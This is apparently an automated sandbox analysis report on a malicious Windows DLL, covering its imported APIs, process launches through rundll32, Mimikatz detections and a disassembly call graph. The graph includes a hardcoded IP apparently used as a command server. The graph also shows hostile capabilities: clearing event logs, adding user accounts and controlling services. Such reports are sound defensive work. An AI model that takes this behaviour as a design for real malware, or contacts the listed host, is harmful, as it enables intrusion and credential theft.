                                                        GDI32.dllGetDeviceCaps, CreateDIBSection, CreateCompatibleDC, DeleteObject, DeleteDC, BitBlt, GetRegionData, CombineRgn, CreateRectRgnIndirect, GetDIBits, CreateCompatibleBitmap, SelectObject
                                                        ADVAPI32.dllRegOpenKeyA, GetTokenInformation, LookupAccountSidA, AbortSystemShutdownA, RegCloseKey, RegOpenKeyExA, GetUserNameA, CloseEventLog, ClearEventLogA, OpenEventLogA, RegSetValueExA, RegCreateKeyA, StartServiceA, CloseServiceHandle, OpenServiceA, OpenSCManagerA, SetServiceStatus, DeleteService, FreeSid, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, AllocateAndInitializeSid, RegEnumValueA, RegEnumKeyExA, RegQueryValueExA, RegDeleteValueA, RegDeleteKeyA, RegQueryInfoKeyA, RegCreateKeyExA, UnlockServiceDatabase, ChangeServiceConfigA, LockServiceDatabase, ControlService, QueryServiceStatus, QueryServiceConfig2A, QueryServiceConfigA, EnumServicesStatusA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, CheckTokenMembership
                                                        SHELL32.dllShellExecuteExA, SHGetFolderPathA, SHGetSpecialFolderPathA, SHGetFileInfoA, ShellExecuteA
                                                        ole32.dllCoUninitialize, CoCreateInstance, CoInitialize
                                                        OLEAUT32.dllSysFreeString
                                                        MFC42.DLL
                                                        MSVCRT.dll_adjust_fdiv, _initterm, _onexit, __dllonexit, ??1type_info@@UAE@XZ, _snprintf, swprintf, _splitpath, strncpy, atol, strncat, realloc, fgets, srand, time, isdigit, _iob, _access, wcstombs, mbstowcs, _errno, _wcsupr, _strcmpi, _itoa, _strnicmp, fprintf, sscanf, getenv, vsprintf, exit, __CxxFrameHandler, memmove, ceil, _ftol, strstr, wcslen, wcscpy, sprintf, printf, fclose, fopen, remove, atoi, free, malloc, strncmp, _CIpow, floor, strchr, tolower, _CxxThrowException, _stricmp, _except_handler3, strrchr, _strlwr, wcsstr, rand, system
                                                        MSVCP60.dll??0_Lockit@std@@QAE@XZ, ??1_Lockit@std@@QAE@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z, ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z, ?_Xlen@std@@YAXXZ, ?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z, ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z, ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z, ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z, ?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB, ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z, ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z, ?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z, ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z, ?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ, ?_Xran@std@@YAXXZ, ?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB, ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z, ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z, ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ, ??0Init@ios_base@std@@QAE@XZ, ??1Init@ios_base@std@@QAE@XZ, ??0_Winit@std@@QAE@XZ, ??1_Winit@std@@QAE@XZ
                                                        WINMM.dllmciSendStringA, waveInGetNumDevs
                                                        WS2_32.dllgethostname, inet_addr, getsockname, bind, getpeername, accept, listen, sendto, recvfrom, ntohs, inet_ntoa, send, closesocket, recv, select, gethostbyname, connect, setsockopt, WSAIoctl, WSACleanup, WSAStartup, __WSAFDIsSet, ioctlsocket, socket, htons
                                                        iphlpapi.dllGetIfTable
                                                        dwmapi.dllDwmIsCompositionEnabled
                                                        SHLWAPI.dllPathFindFileNameA, PathUnquoteSpacesA, PathRemoveArgsA, PathGetArgsA, SHDeleteKeyA
                                                        WININET.dllInternetGetConnectedState, InternetReadFile, HttpSendRequestA, InternetOpenUrlA, HttpOpenRequestA, InternetOpenA, InternetConnectA, InternetCloseHandle, HttpQueryInfoA
                                                        NETAPI32.dllNetUserSetInfo, NetUserAdd, NetUserGetLocalGroups, NetApiBufferFree, NetUserGetInfo, NetUserEnum, NetLocalGroupAddMembers, NetUserDel
                                                        PSAPI.DLLGetProcessMemoryInfo, GetModuleFileNameExA
                                                        WTSAPI32.dllWTSEnumerateSessionsA, WTSDisconnectSession, WTSLogoffSession, WTSQuerySessionInformationA, WTSFreeMemory, WTSQuerySessionInformationW

                                                        Exports

                                                        NameOrdinalAddress
                                                        Shellex10x1001efd0

                                                        Network Behavior

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 18, 2024 14:19:34.863145113 CET5353589162.159.36.2192.168.2.7
                                                        Nov 18, 2024 14:19:35.506114960 CET53542791.1.1.1192.168.2.7

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:5
                                                        Start time:08:18:45
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\loaddll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll"
                                                        Imagebase:0x7c0000
                                                        File size:126'464 bytes
                                                        MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:6
                                                        Start time:08:18:45
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:8
                                                        Start time:08:18:45
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:9
                                                        Start time:08:18:45
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe C:\Users\user\Desktop\l10U7QN0CY.dll,Shellex
                                                        Imagebase:0x150000
                                                        File size:61'440 bytes
                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000009.00000002.3727481281.000000001011E000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:10
                                                        Start time:08:18:45
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1
                                                        Imagebase:0x150000
                                                        File size:61'440 bytes
                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 0000000A.00000002.3727479077.000000001011E000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:11
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:13
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd /c md C:\Users\Public\Documents\MM
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:15
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7b4ee0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:18
                                                        Start time:08:18:46
                                                        Start date:18/11/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:50%
                                                          Total number of Nodes:244
                                                          Total number of Limit Nodes:11
                                                          execution_graph 21793 1001efd0 12 API calls 21874 1001b660 GetModuleHandleA 21793->21874 21795 1001f1d6 21796 1001b660 3 API calls 21795->21796 21797 1001f258 21796->21797 21798 1001b660 3 API calls 21797->21798 21799 1001f2c9 21798->21799 21800 1001b660 3 API calls 21799->21800 21801 1001f3ed 21800->21801 21802 1001b660 3 API calls 21801->21802 21803 1001f54e 21802->21803 21804 1001b660 3 API calls 21803->21804 21805 1001f67b 21804->21805 21806 1001b660 3 API calls 21805->21806 21807 1001f729 21806->21807 21808 1001b660 3 API calls 21807->21808 21809 1001f7c3 21808->21809 21810 1001b660 3 API calls 21809->21810 21811 1001f80d 21810->21811 21812 1001b660 3 API calls 21811->21812 21813 1001f893 21812->21813 21814 1001b660 3 API calls 21813->21814 21815 1001f93e GetCurrentThreadId PostThreadMessageA 21814->21815 21816 1001f959 InitializeSecurityDescriptor SetSecurityDescriptorDacl GetCommandLineA CreateMutexA 21815->21816 21818 1001fa63 21816->21818 21819 1001fa52 GetLastError 21816->21819 21821 1001fe86 21818->21821 21822 1001fadf 21818->21822 21819->21818 21820 1001fec6 21819->21820 21878 1001ab20 21821->21878 21824 1001fc40 21822->21824 21825 1001faeb strstr 21822->21825 21824->21820 21827 1001fc4c 21824->21827 21828 1001fb07 Sleep 21825->21828 21829 1001fb18 21825->21829 21826 1001fea1 21832 1001feb5 Sleep 21826->21832 21833 1001fea8 21826->21833 21893 1001e440 15 API calls 21827->21893 21835 1001ef90 24 API calls 21828->21835 21888 1001fee0 OpenSCManagerA OpenServiceA CloseServiceHandle CloseServiceHandle CloseServiceHandle 21829->21888 21885 1001ef90 21832->21885 21896 1001e440 15 API calls 21833->21896 21835->21828 21836 1001fb22 21840 1001fbb6 sprintf 21836->21840 21841 1001fb2d 21836->21841 21839 1001fc5f 21839->21820 21845 1001fc98 sprintf 21839->21845 21890 1001e440 15 API calls 21840->21890 21848 1001fb52 OpenSCManagerA 21841->21848 21849 1001fba5 Sleep 21841->21849 21842 1001feb2 21842->21832 21851 1001fd01 21845->21851 21846 1001fc15 21891 1001ff30 9 API calls 21846->21891 21848->21849 21853 1001fb65 OpenServiceA 21848->21853 21854 1001ef90 24 API calls 21849->21854 21855 1001fe75 Sleep 21851->21855 21856 1001fd0a GetModuleFileNameA sprintf 21851->21856 21852 1001fc31 21892 1001ea60 9 API calls 21852->21892 21858 1001fba2 CloseServiceHandle 21853->21858 21859 1001fb7f StartServiceA 21853->21859 21854->21849 21864 1001ef90 24 API calls 21855->21864 21865 1001fdbc Sleep 21856->21865 21858->21849 21862 1001fba0 CloseServiceHandle 21859->21862 21863 1001fb8d CloseServiceHandle CloseServiceHandle 21859->21863 21861 1001fc39 ExitProcess 21862->21858 21889 1001ea60 9 API calls 21863->21889 21864->21855 21868 1001fe12 21865->21868 21867 1001fb99 ExitProcess 21894 1001e800 GetModuleHandleA LoadLibraryA GetProcAddress CloseHandle 21868->21894 21870 1001fe2d sprintf 21871 1001fe69 21870->21871 21895 1001ea60 9 API calls 21871->21895 21873 1001fe6e ExitProcess 21875 1001b670 LoadLibraryA 21874->21875 21876 1001b67b GetProcAddress 21874->21876 21875->21876 21877 1001b689 21875->21877 21876->21795 21877->21795 21897 10014700 LoadLibraryA GetProcAddress #823 #823 RegOpenKeyExA 21878->21897 21880 1001abc8 lstrlenA 21881 1001ac37 lstrlenA 21880->21881 21882 1001abd6 CreateFileA 21880->21882 21881->21826 21883 1001ac30 CloseHandle 21882->21883 21884 1001ac17 GetFileSize ReadFile 21882->21884 21883->21881 21884->21883 21925 1002bdb0 LoadLibraryA GetProcAddress 21885->21925 21887 1001efa7 WaitForSingleObject CloseHandle 21887->21832 21888->21836 21889->21867 21890->21846 21891->21852 21892->21861 21893->21839 21894->21870 21895->21873 21896->21842 21898 10014881 21897->21898 21899 10014899 21897->21899 21923 10014c12 RegCloseKey RegCloseKey 21898->21923 21902 10014a03 RegQueryValueExA 21899->21902 21903 100148c2 RegQueryValueExA 21899->21903 21904 10014ba2 wsprintfA 21899->21904 21905 10014908 RegQueryValueExA 21899->21905 21906 10014acc RegEnumValueA 21899->21906 21907 10014a30 RegEnumKeyExA 21899->21907 21908 10014bf5 lstrcatA 21899->21908 21909 10014bcf wsprintfA 21899->21909 21910 10014b58 wsprintfA 21899->21910 21911 10014b7d wsprintfA 21899->21911 21912 100149bc RegQueryValueExA 21899->21912 21919 100148ac 21899->21919 21921 100148f2 21899->21921 21902->21921 21903->21921 21904->21908 21920 10014934 21905->21920 21905->21921 21916 10014b44 21906->21916 21906->21921 21915 10014a78 wsprintfA 21907->21915 21907->21921 21908->21880 21909->21908 21910->21908 21911->21908 21914 100149e8 wsprintfA 21912->21914 21912->21921 21913 10014894 #825 #825 21913->21880 21914->21921 21915->21907 21916->21904 21916->21908 21916->21909 21916->21910 21916->21911 21919->21902 21919->21903 21919->21904 21919->21905 21919->21908 21919->21909 21919->21910 21919->21911 21919->21912 21919->21921 21920->21921 21922 1001494e strncat strncat strchr 21920->21922 21924 10014c12 RegCloseKey RegCloseKey 21921->21924 21922->21920 21923->21913 21924->21913 21926 1002bdf3 CreateThread LoadLibraryA GetProcAddress 21925->21926 21927 1002be35 CloseHandle 21926->21927 21928 1002bcb0 21926->21928 21927->21887 21934 10010ca0 21928->21934 21930 1002bcee LoadLibraryA GetProcAddress 21931 1002bd5e 21930->21931 21932 1002bd69 21931->21932 21935 1002bfa0 14 API calls 21931->21935 21934->21930 21935->21932 21936 1002d2eb 21937 1002d2fe 21936->21937 21942 1002d307 21936->21942 21939 1002d32f 21937->21939 21951 100214b0 21937->21951 21938 1002d323 21965 1002d240 malloc _initterm free 21938->21965 21942->21937 21942->21938 21942->21939 21943 1002d32b 21943->21937 21945 1002d34f 21945->21939 21946 1002d358 21945->21946 21967 1002d240 malloc _initterm free 21946->21967 21947 1002d347 21966 1002d240 malloc _initterm free 21947->21966 21950 1002d360 21950->21939 21952 10021588 21951->21952 21953 100214be 21951->21953 21952->21939 21952->21945 21952->21947 21968 10021410 _access 21953->21968 21955 100214c3 _access 21956 100214e0 WinExec _access 21955->21956 21957 10021521 Sleep 21955->21957 21956->21957 21958 10021500 WinExec Sleep _access 21956->21958 21991 10020f70 21957->21991 21958->21957 21958->21958 21960 1002152d CreateThread 21961 10021551 CreateThread 21960->21961 21962 1002154e CloseHandle 21960->21962 22075 10020fd0 96 API calls 21960->22075 21963 10021566 CloseHandle 21961->21963 21964 10021569 Shellex 21961->21964 22074 100211c0 41 API calls 21961->22074 21962->21961 21963->21964 21964->21952 21965->21943 21966->21945 21967->21950 21969 10021434 21968->21969 21970 1002142b 21968->21970 21969->21955 21996 100209d0 AllocateAndInitializeSid 21970->21996 21973 1002143d GetModuleFileNameA 21973->21969 21974 10021453 21973->21974 21975 1002145b ShellExecuteExA 21974->21975 21976 10021497 GetLastError 21975->21976 21977 1002149f exit 21975->21977 21976->21975 21978 100214b0 21977->21978 21979 10021588 21978->21979 21980 10021410 123 API calls 21978->21980 21979->21955 21981 100214c3 _access 21980->21981 21982 100214e0 WinExec _access 21981->21982 21983 10021521 Sleep 21981->21983 21982->21983 21984 10021500 WinExec Sleep _access 21982->21984 21985 10020f70 8 API calls 21983->21985 21984->21983 21984->21984 21986 1002152d CreateThread 21985->21986 21987 10021551 CreateThread 21986->21987 21988 1002154e CloseHandle 21986->21988 22022 10020fd0 _access 21986->22022 21989 10021566 CloseHandle 21987->21989 21990 10021569 Shellex 21987->21990 21999 100211c0 _access 21987->21999 21988->21987 21989->21990 21990->21979 22071 10020f30 GetModuleFileNameA 21991->22071 21993 10020f7a 21994 10020f81 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@ 21993->21994 21995 10020f9f GetLastError ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@ 21993->21995 21994->21960 21995->21960 21997 10020a36 21996->21997 21998 10020a1a CheckTokenMembership FreeSid 21996->21998 21997->21969 21997->21973 21998->21997 22000 100212e1 Sleep CreateFileA 21999->22000 22001 100211f8 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 21999->22001 22002 10021310 MessageBoxA 22000->22002 22003 10021327 GetFileSize 22000->22003 22004 10021228 ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 22001->22004 22005 1002124c ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 22001->22005 22007 100213f0 22002->22007 22008 10021335 MessageBoxA 22003->22008 22009 1002134e VirtualAlloc 22003->22009 22004->22005 22067 10020810 22 API calls 22005->22067 22010 100213e9 CloseHandle 22008->22010 22011 10021369 MessageBoxA 22009->22011 22012 1002137d ReadFile 22009->22012 22010->22007 22011->22010 22014 100213c7 MessageBoxA VirtualFree 22012->22014 22015 1002138e 22012->22015 22013 1002128d 22016 100212a5 22013->22016 22018 100212ab #825 22013->22018 22014->22010 22015->22014 22017 10021393 CloseHandle 22015->22017 22016->22000 22019 100212d8 #825 22016->22019 22021 100212d2 22016->22021 22020 100213a0 VirtualFree 22017->22020 22018->22016 22019->22000 22021->22000 22023 10021123 22022->22023 22024 10021009 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 22022->22024 22025 100209d0 3 API calls 22023->22025 22026 10021063 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 22024->22026 22027 1002103f ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 22024->22027 22028 10021128 22025->22028 22068 10020810 22 API calls 22026->22068 22027->22026 22030 1002114e GetModuleFileNameA 22028->22030 22031 1002112c 22028->22031 22032 10021163 22030->22032 22033 10021131 22030->22033 22069 10020c20 41 API calls 22031->22069 22038 1002116e ShellExecuteExA 22032->22038 22035 100210b4 22036 100210cd 22035->22036 22037 100210d3 #825 22035->22037 22039 10021118 Sleep 22036->22039 22042 1002110f #825 22036->22042 22044 10021109 22036->22044 22037->22036 22040 100211a6 GetLastError 22038->22040 22041 100211ae exit 22038->22041 22039->22023 22040->22038 22043 100211c0 _access 22041->22043 22042->22039 22045 100212e1 Sleep CreateFileA 22043->22045 22046 100211f8 ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N 22043->22046 22044->22039 22047 10021310 MessageBoxA 22045->22047 22048 10021327 GetFileSize 22045->22048 22049 10021228 ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI 22046->22049 22050 1002124c ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI 22046->22050 22052 100213f0 22047->22052 22053 10021335 MessageBoxA 22048->22053 22054 1002134e VirtualAlloc 22048->22054 22049->22050 22070 10020810 22 API calls 22050->22070 22055 100213e9 CloseHandle 22053->22055 22056 10021369 MessageBoxA 22054->22056 22057 1002137d ReadFile 22054->22057 22055->22052 22056->22055 22058 100213c7 MessageBoxA VirtualFree 22057->22058 22059 1002138e 22057->22059 22058->22055 22059->22058 22061 10021393 CloseHandle 22059->22061 22060 100212a5 22060->22045 22064 100212d8 #825 22060->22064 22066 100212d2 22060->22066 22065 100213a0 VirtualFree 22061->22065 22062 1002128d 22062->22060 22063 100212ab #825 22062->22063 22063->22060 22064->22045 22066->22045 22067->22013 22068->22035 22069->22033 22070->22062 22072 10020f53 CopyFileA 22071->22072 22073 10020f4c 22071->22073 22072->21993 22073->21993

                                                          Executed Functions

                                                          Function 1001EFD0 Relevance: 417.3, APIs: 40, Strings: 198, Instructions: 780stringservicesleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 1001efd0-1001fa50 #823 lstrcpyA * 11 call 1001b660 * 11 GetCurrentThreadId PostThreadMessageA InitializeSecurityDescriptor SetSecurityDescriptorDacl GetCommandLineA CreateMutexA 25 1001fa63-1001faba 0->25 26 1001fa52-1001fa5d GetLastError 0->26 29 1001fad0-1001fad9 25->29 30 1001fabc-1001faca 25->30 26->25 27 1001fec6-1001fed2 26->27 31 1001fe86-1001fea6 call 1001ab20 29->31 32 1001fadf-1001fae5 29->32 30->29 42 1001feb5 31->42 43 1001fea8-1001feb2 call 1001e440 31->43 34 1001fc40-1001fc46 32->34 35 1001faeb-1001fb05 strstr 32->35 34->27 37 1001fc4c-1001fc92 call 1001e440 34->37 38 1001fb07 35->38 39 1001fb18-1001fb27 call 1001fee0 35->39 37->27 58 1001fc98-1001fd04 sprintf 37->58 40 1001fb0d-1001fb16 Sleep call 1001ef90 38->40 51 1001fbb6-1001fc3a sprintf call 1001e440 call 1001ff30 call 1001ea60 ExitProcess 39->51 52 1001fb2d-1001fb50 39->52 48 1001febb-1001febf Sleep call 1001ef90 42->48 43->42 57 1001fec4 48->57 62 1001fb52-1001fb63 OpenSCManagerA 52->62 63 1001fba5 52->63 57->48 69 1001fe75 58->69 70 1001fd0a-1001fe6f GetModuleFileNameA sprintf Sleep call 1001e800 sprintf call 1001ea60 ExitProcess 58->70 62->63 67 1001fb65-1001fb7d OpenServiceA 62->67 64 1001fbab-1001fbb4 Sleep call 1001ef90 63->64 72 1001fba2-1001fba3 CloseServiceHandle 67->72 73 1001fb7f-1001fb8b StartServiceA 67->73 74 1001fe7b-1001fe84 Sleep call 1001ef90 69->74 72->63 77 1001fba0 CloseServiceHandle 73->77 78 1001fb8d-1001fb9a CloseServiceHandle * 2 call 1001ea60 ExitProcess 73->78 77->72
                                                          APIs
                                                          • #823.MFC42(00000849), ref: 1001EFDF
                                                          • lstrcpyA.KERNEL32(27.124.13.32,00000000), ref: 1001F006
                                                          • lstrcpyA.KERNEL32(1011EAFC,0000012C), ref: 1001F014
                                                          • lstrcpyA.KERNEL32(Default,00000260), ref: 1001F022
                                                          • lstrcpyA.KERNEL32(1.0,00000292), ref: 1001F030
                                                          • lstrcpyA.KERNEL32(1011EC82,000002B2), ref: 1001F03E
                                                          • lstrcpyA.KERNEL32(1011ECE6,00000316), ref: 1001F04C
                                                          • lstrcpyA.KERNEL32(1011ED66,00000396), ref: 1001F05A
                                                          • lstrcpyA.KERNEL32(1011EE66,00000496), ref: 1001F068
                                                          • lstrcpyA.KERNEL32(1011EF78,000005A8), ref: 1001F076
                                                          • lstrcpyA.KERNEL32(1011EFDC,0000060C), ref: 1001F084
                                                          • lstrcpyA.KERNEL32(1011F018,00000648), ref: 1001F092
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • GetCurrentThreadId.KERNEL32 ref: 1001F94E
                                                          • PostThreadMessageA.USER32(00000000,?,?,?,?,?,?), ref: 1001F955
                                                          • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?,?), ref: 1001F973
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?), ref: 1001F987
                                                          • GetCommandLineA.KERNEL32 ref: 1001F9B1
                                                          • CreateMutexA.KERNELBASE(?,00000000,00000000), ref: 1001FA43
                                                          • GetLastError.KERNEL32 ref: 1001FA52
                                                          • strstr.MSVCRT ref: 1001FAFA
                                                          • Sleep.KERNEL32(00000032,?,?,?,?,?,?,?,?), ref: 1001FB0F
